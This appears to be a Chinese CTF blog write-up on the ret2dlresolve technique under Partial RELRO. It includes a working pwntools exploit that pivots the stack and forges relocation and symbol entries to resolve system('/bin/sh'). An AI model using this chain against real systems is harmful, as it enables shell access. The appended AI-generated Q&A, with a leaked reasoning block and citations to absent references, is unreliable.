ret2dlresolve(2)

最新推荐文章于 2024-09-24 18:00:58 发布
原创 最新推荐文章于 2024-09-24 18:00:58 发布 · 251 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

ret2dlresolve(2)

ret2dlresolve(1)中,关闭了Partial RELRO保护,因此能够对.dynamic进行修改,从而改变dynamic中dynstr的地址,通过伪造一个dynstr来实现将函数write链接到system函数
那么如果打开了Partial RELRO保护,将如何进行

代码还是之前的代码,通过如下方式进行编译

gcc -fno-stack-protector -m32 -z relro -z lazy -no-pie ../../main.c -o main_partial_relro_32

你也可以继续用关闭了Partial RELRO的程序,就当换个思路去执行system

dlresolve前后过程

在调用dl_runtime_resolve函数前,需要压入两个参数

  • reloc_arg,函数自己plt中push的内容,是该函数在.rel.plt的偏移
    在这里插入图片描述
  • link_map,公共plt表项,在plt开始push的参数
    在这里插入图片描述以setuf第一次调用为例
    在这里插入图片描述首先,第一个jmp会去判断函数是否已经有链接过,如果有就会到got表去执行,如果没有就向下执行
    push 0,就是传入dl_runtime_resolve的参数reloc_arg,接着跳转到plt开始处执行第二个push
    这里压入的就是参数link_map,压入的是一个地址
    在这里插入图片描述

通过link_map能够找到.dynamic的地址
在这里插入图片描述

这两个参数都可以控制,一是控制reloc_arg能够修改函数.rel.plt的位置执行自己伪造的值,二是控制link_map指向的地址,并在该地址处伪造数据,并将.dynstr的地址修改之后就和之前那篇文章一样了(第二种暂时还在测试中)

先来看修改reloc_arg的意义何在
还是上面的setbuf,他传入的reloc_arg是0,因此程序会在.rel.plt + 0处去寻找对应重定位表项
在这里插入图片描述得到两个值,第一个值是该函数got表地址,第二个值是.dynsym的偏移
通过定位到dynsym表项内容,能够找到这个函数的符号定义,也就是定位到.dynstr对应的位置。
在这里插入图片描述

关于这里的计算
1、根据reloc_arg定位到setbuf的重定位表0x8048330
setbuf重定位表项中804A00Ch, 107h这两个值,第二个0x107
0x107分两个部分,前一个字节也就是0111,应该是某种标志位,具体对应什么还不了解
后面两个字节00010000 -> 0x10就是在.dynsym中的偏移
2、之后根据偏移找到表项,其中有几个值,这里就看第一个的意义
offset aSetbuf - offset byte_8048278是对.dynstr中的偏移,0x33
3、通过偏移在.dynstr找到该函数的符号setbuf在这里插入图片描述

整体流程(来上大佬的图)
在这里插入图片描述

利用

到这里,目标就很明确了,修改reloc_arg指向自己定义的重定位表项,在重定位表项中修改动态符号表也就是.dynsym的偏移,使其能够指向自己定义的符号的地址

需要注意的是,要先进行栈迁移,如果直接在原栈上操作会出现很多莫名奇妙的问题,自己尝试不进行栈迁移,在测试修改动态符号表时,我输入的数据并没有到我期望的位置去,后来了解到是因为缓冲区大小不够的原因,导致后面写入的 数据跑到前面去了,所以还是要进行栈迁移。
至于迁移到那,就选一个可写,并且没被占用的位置就行

exp

from pwn import *
#context.log_level="debug"
context.arch="i386"
p = process("./main32")
rop = ROP("./main32")
elf = ELF("./main32")


p.recvline()

def debug():
	gdb.attach(p)
	pause()

offset = 92

rop.raw(offset*'a')
#栈迁移
base_addr = 0x0804a340
rop.read(0, base_addr, 100)
rop.migrate(base_addr)
p.sendline(rop.chain())

rop = ROP("./main32")

plt0 = elf.get_section_by_name('.plt').header.sh_addr
rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr
dynsym = elf.get_section_by_name('.dynsym').header.sh_addr
dynstr = elf.get_section_by_name('.dynstr').header.sh_addr


write_reloc_addr = base_addr + 24
write_dynsym_addr = write_reloc_addr + 0x10
system_addr = write_dynsym_addr + 0x10
print(hex(dynsym))
print(hex(write_dynsym_addr))

write_reloc = flat([0x804A01C, (((write_dynsym_addr - dynsym) & 0xfff0) << 4) + 7])
#write_reloc = flat([0x804A01C, 0x607])
print(hex((((write_dynsym_addr - dynstr) & 0xfff0) << 4) + 7))
write_dynsym = flat([system_addr + 0x8 - dynstr, 0, 0, 0x12])
#write_dynsym = flat([0x4c, 0, 0, 0x12])
print("write_dynsym:" + hex(write_dynsym_addr))
print("system_addr:" + hex(system_addr))

rop.raw(plt0) #4
rop.raw(write_reloc_addr - rel_plt)
rop.raw(elf.sym['main']) 
rop.raw(system_addr)
rop.raw(1)
rop.raw(1)
rop.raw(write_reloc)
rop.raw('a' * 8)
rop.raw(write_dynsym)
print(system_addr - base_addr)
print(len(rop.chain()))
rop.raw('/bin/sh\x00')
rop.raw('system\x00')
p.sendline(rop.chain())

p.interactive()
ret2dlresolve,ret2srop
2302_79813730的博客
02-06 1206
那么如果我们可以控制相应的参数及其对应地址的内容是不是就可以控制解析的函数了呢?没有一个函数,也不是我们经常利用的read,write函数,这里只有一次发送机会,但我们要发送两次,第一次先将返回地址再改成vuln函数,第二次发送我们的rop链。主要是2,这个过程会rt_sigreturn函数进行还原,而且是根据栈中内容去还原,之后我们可以利用工具去伪造我们想要rop链。一般,我们也称其为软中断信号,或者软中断。首先,32位的 标志特别突出,只有read函数能栈溢出。的机制,我们可以构造一个假的。
栈溢出之ret2dlresolve
zyxx_wjc的博客
05-07 1195
三月份在buuctf上举办的DASCTF上有一道“简单"的栈题——checkin,然而我这个菜鸡拿到题之后直接麻爪了——没有输出咋泄露libc啊(这个Jmp.Cliff他就是逊啦......)......后来学长告诉我,有个技巧叫ret2dlresolve,可以处理这种没有输出的情况,自知基础不牢的我老老实实回到CTF wiki上找到了这个技巧,又参考了网上很多大佬的博客,啃了几天,总算是啃明白了。这两天国赛临近,正积极备赛,突然想到这个有些生疏的知识还未整理,就写个博客记录一下吧。 本文主要围绕64位下
ret2dl-resolve
fa1c4的blog
04-19 457
最早是2015年在一篇论文中提出的攻击技术. How the ELF Ruined Christmas 因为通常漏洞利用包含两个阶段 信息泄露, 得知内存布局 通过已知内存布局, 利用漏洞 但由于不是常常能够得知内存信息, 所以ret2dl-resolve是一种仅仅利用ELF文件格式和动态装载器弱点进行漏洞利用的方法. 符号解析图示 .rel.plt段由Elf_Rel结构体构成 Elf_Rel结构体 struct Elf32_Rel { Elf32_Addr r_offset; // Loca
ret2dl_resolve
GalaxySpaceX的博客
09-24 1088
ret2dl_resolve
Ret2dlresolve、Srop
weixin_66751120的博客
03-08 1759
介绍了ret2dlresolve和srop利用工具构造脚本进行解题的方法
ret2dlresolve】学习和体会
ethan18的博客
08-07 198
我们用reloc_offset找到.rel.plt中的对应结构体,再通过rel_info在.dynsym中找到第[rel_info >>8]个结构体,最后通过st_name在.dynstr中找到第st_name个参数,这个参数是个字符串,表示的就是我们要的函数的名字。这里我画个图,手画的比较粗糙,来解释一下_dl_runtime_resolve(link_map,reloc_offset)函数。PLT[0]的保存的指针指向_dl_runtime_resolve的第一个参数:link_map。
ret2dlresolve(3)
F_Day_的博客
10-30 254
ret2dlresolve(3) 64位norelro下的ret2dlresolve 本来思路是与32的差不多,只不过是寄存器传参,但硬是出了一个意想不到的问题 这里我用到了ret2csu来进行程序流的控制 def csu(rbx, rbp, r12, r13, r14, r15, ret): payload = p64(loc_6pr) payload += p64(1) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) +
ret2dlresolve以及srop
2301_81031055的博客
02-22 697
linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了。所以我们就会想到用srop去解题,首先需要伪造栈帧信息,通过执行sigreturn(也就是syscall系统调用),还原出我们伪造的栈帧信息,来达到控制寄存器的目的 ,上面的网站有详细的讲解呦!这里我们可以直接通过脚本去获取权限。
ret2dlresolve(4)
F_Day_的博客
11-15 2468
ret2dlresolve(4) 这次是64位下,开了Partial RELRO保护 这次记录自己的解题过程 先测试一下传入自己构造的reloc_arg看看程序能不能正常运行 elf = ELF('./main64') def debug(): gdb.attach(p) pause() def csu(r12, r13, r14, r15, ret): rbx = 0 rbp = 1 payload = p64(0x400766) payload += p64(1) + p64(rbx
pwn-ret2dl-resolve
CharlesGodX的博客
05-04 622
pwn-ret2dl-resolve 0x00:漏洞介绍 ret2dl-resovle这种技术在pwn中的运用也挺多的,可以类比Windows下的IAT技术进行学习,了解这个技术之前,我们需要知道ELF文件中各个函数的加载过程,下面就演示一下GOT表是如何加载的,首先我们编译一个简单的程序 #include <stdio.h> int main() { puts("Hello ...
pwn学习】- ret2dlresolve
Morphy_Amo的博客
04-12 3859
ret2dlreslove
ret2dlresolve(32位)
qq_45595732的博客
03-03 320
穿插例题XDCTF2015 bof ELF程序的基本相关结构 节区中包含目标文件的所有信息。节的相关结构体。 typedef struct { Elf32_Word sh_name; /* Section name (string tbl index) 节区头部字符串节区的索引*/ Elf32_Word sh_type; /* Section type 节区类型*/ Elf32_Word sh_flags; /* Section flags 节区标志,用于描述属性*/ Elf32_
Ret2dlresolvePayload使用
qq_45595732的博客
03-05 1152
对于Ret2dlresolve,payload构造特别麻烦,但pwntools有相应的工具,其payload构造可以由Ret2dlresolvePayload来完成。(真香) help(pwnlib.rop.ret2dlresolve.Ret2dlresolvePayload) Help on class Ret2dlresolvePayload in module pwnlib.rop.ret2dlresolve: class Ret2dlresolvePayload(__builtin__.objec
ret2dlresolve归纳
am_03的博客
09-02 423
ret2dl_resolve的原理: 动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index) 功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项 第一个参数link_map_obj一直为GOT[1]的地址 第二个参数reloc_index为被绑定函数在.rel.plt段里的相对偏移 原理: 1.调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈里的重定向表表项 2.- 伪造重定向表表项,修改第二项里符号表索
ret2dl_resolve 知识点总结
qq_43189757的博客
07-11 538
ret2dl-resole 是通过伪造到 .rel.plt , .dynsym, .dynstr中表项中的偏移以及伪造这三个段中的数据结构来达到调用system 函数的目的 这三个段的信息都可以在IDA中 DYNAMIC 段中找到 DT_STRTAB -> .dynstr DT_SYMTAB -> .dynsym DT_JMPREL -> .rel.plt...
PWN入门之栈溢出之ret2dlresolve
weixin_44681716的博客
05-03 1237
实验目的 当一个程序第一次调用libc中的函数时,必须首先对libc中函数的真实地址进行重定位,而这个绑定寻找真实地址的过程由dl_runtime_resolve完成。 dl_runtime_resolve需要两个参数,一个是link_map=*(GOT[1]),即链接器标志信息和reloc_arg(标志该函数重定位入口偏移),我们需要做的就是控制reloc_arg从而使dl_runtime_re...
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 7554
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
从o开始的pwn学习之超详细ret2dl_resolve
jzc020121的博客
05-01 3374
文章目录从o开始的pwn学习之超详细ret2dl_resolve前置知识需要用到的节_dll_runtime_resolve函数延迟绑定机制_dl_fixup()函数RELROFull RELRONO RELROPartial RELRO_dll_runtime_resolve干了什么实践调用库函数实例插一个有意思的小点,关于低地址gdb无法断点调试这件事call指令的诞生与消亡栈迁移ret2dl_resolvelevel1EXP1level2目标计算 relloc_argEXP2level3思路EXP3l
Ret2dl_resolve学习笔记
sopora的博客
06-17 983
ret2dl_resolve的原理: 动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index) 功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项 第一个参数link_map_obj恒为GOT[1]的地址 第二个参数reloc_index为被绑定函数在.rel.plt段中的相对偏移 原理: 调用_dl_runtime_...
为什么我的elf.plt['']用不了 File "/home/c1ay/target/myAttack/0xgamelibc.py", line 12, in <module> puts_plt = elf.plt['puts'] ~~~~~~~^^^^^^^^ File "/home/c1ay/.local/share/pipx/venvs/pwntools/lib/python3.13/site-packages/pwnlib/elf/elf.py", line 164, in __missing__ raise KeyError(name) KeyError: 'puts'
最新发布
10-13
<think>Hmm, the user is asking about a specific KeyError when using elf.plt['puts'] in binary exploitation. Let me piece this together from the provided references. First, looking at reference [1], it mentions that ret2libc attacks rely on dynamic linking mechanisms, and this error occurs when the puts symbol isn't properly resolved. The key insight here is that the program's Procedure Linkage Table (PLT) might not contain a 'puts' entry at all. Reference [2] and [3] show practical exploitation examples where puts_plt is successfully used, but reference [4] has that interesting payload using write_plt instead. That makes me think - maybe the vulnerable binary doesn't actually call puts() anywhere? If the code only uses write() (like in the fun.c example from [1]), the linker wouldn't create a PLT entry for puts. The user seems to be doing CTF/pwn challenges based on the XCTF reference. They're probably frustrated because typical ret2libc tutorials assume puts is present. The real issue is symbol visibility - if the binary never imports puts, elf.plt won't have it. Wait, reference [1] explicitly says: "when program doesn't leak puts or system". That's the direct cause! The solution path would be: check if puts is imported → if not, find alternative leak gadgets (maybe write like in [4]) → or force symbol resolution through ret2dlresolve as mentioned in the blog. The user might need confirmation that skipping puts is valid. They may feel stuck following tutorials that assume its presence. The deeper need is understanding how to adapt techniques when expected symbols are missing - a common CTF scenario. </think>使用 `elf.plt['puts']` 出现 **KeyError: 'puts'** 的根本原因是目标二进制文件的 **PLT 表未包含 `puts` 函数的动态链接入口**。以下是详细分析和解决方案: --- ### **原因分析** 1. **缺失 PLT 入口** - 动态链接的二进制文件只会为 **实际被调用的外部函数** 生成 PLT 入口。 - 若程序从未调用 `puts`(如引用[1]的 `fun.c` 仅使用 `read`/`write`),则 ELF 文件中不存在 `puts.plt` 项,导致 `elf.plt['puts']` 查询失败。 - *验证方法*: ```python from pwn import ELF elf = ELF("./target") print(".plt entries:", list(elf.plt)) # 检查输出是否包含 'puts' ``` 2. **符号表损坏或剥离** - 若二进制文件被剥离(`strip`)或符号表损坏,`pwntools` 无法解析符号名,即使 PLT 存在也会报错。 - *验证方法*: ```bash readelf -s ./target | grep puts # 检查符号表是否包含 puts ``` 3. **静态编译或非常规链接** - 静态编译的程序无 PLT/GOT 结构,直接报错。 - 某些保护机制(如 `-fno-plt`)会绕过 PLT 直接链接。 --- ### **解决方案** #### 1. **改用实际存在的函数** 根据代码逻辑替换为其他输出函数(如 `write`),参考引用[4]的 payload: ```python payload = padding + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) ``` *适用场景*:程序显式调用了 `write` 等替代函数。 #### 2. **手动计算 PLT 地址** 若已知 `puts` 的 PLT 偏移(如通过IDA分析): ```python puts_plt = elf.address + 0x1234 # 0x1234 替换为实际偏移 ``` *验证步骤*: - 用 IDA/Ghidra 打开二进制文件,查看 `.plt.sec` 或 `.plt` 段中 `puts` 的地址。 #### 3. **泄露 libc 基址后解析符号** 通过其他函数泄露 libc 基址,再计算 `puts` 的真实地址: ```python libc.address = leak_addr - libc.sym['write'] # 通过 write 泄露 system_addr = libc.sym['system'] ``` *步骤参考引用[2]*: - 先泄露 `write_got` → 计算 libc 基址 → 定位任意 libc 函数。 #### 4. **使用 ret2dlresolve 攻击** 当所有输出函数均不可用时(引用[1]的核心思路): - 伪造 ELF 的 Relocation 结构(`.dynsym`, `.dynstr`),强制动态链接器解析 `puts`。 - 需构造复杂 payload 控制 `_dl_runtime_resolve` 的参数。 *适用场景*:无输出函数、无 libc 泄露的极端情况。 --- ### **验证流程建议** 1. **检查二进制依赖**: ```bash ldd ./target # 确认动态链接 file ./target # 检查是否剥离("stripped") ``` 2. **分析函数调用**: ```bash objdump -D ./target | grep puts # 搜索是否调用 puts ``` 3. **动态调试**: ```bash gdb ./target (gdb) info functions @plt # 查看所有 PLT 项 ``` > **总结**:优先选择 **方案1(改用 `write`)** 或 **方案3(libc 泄露)**,90% 的 CTF 题目可通过二者解决。极端情况再考虑 ret2dlresolve(方案4),需深入理解 ELF 动态链接机制[^1][^4]。 --- ### 相关问题 1. 如何通过 `write` 函数泄露 libc 基址? 2. ret2dlresolve 攻击中需要伪造哪些 ELF 数据结构? 3. 静态编译的二进制文件如何进行 ROP 攻击? 4. 如何修复剥离符号表的 ELF 文件以辅助分析?
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值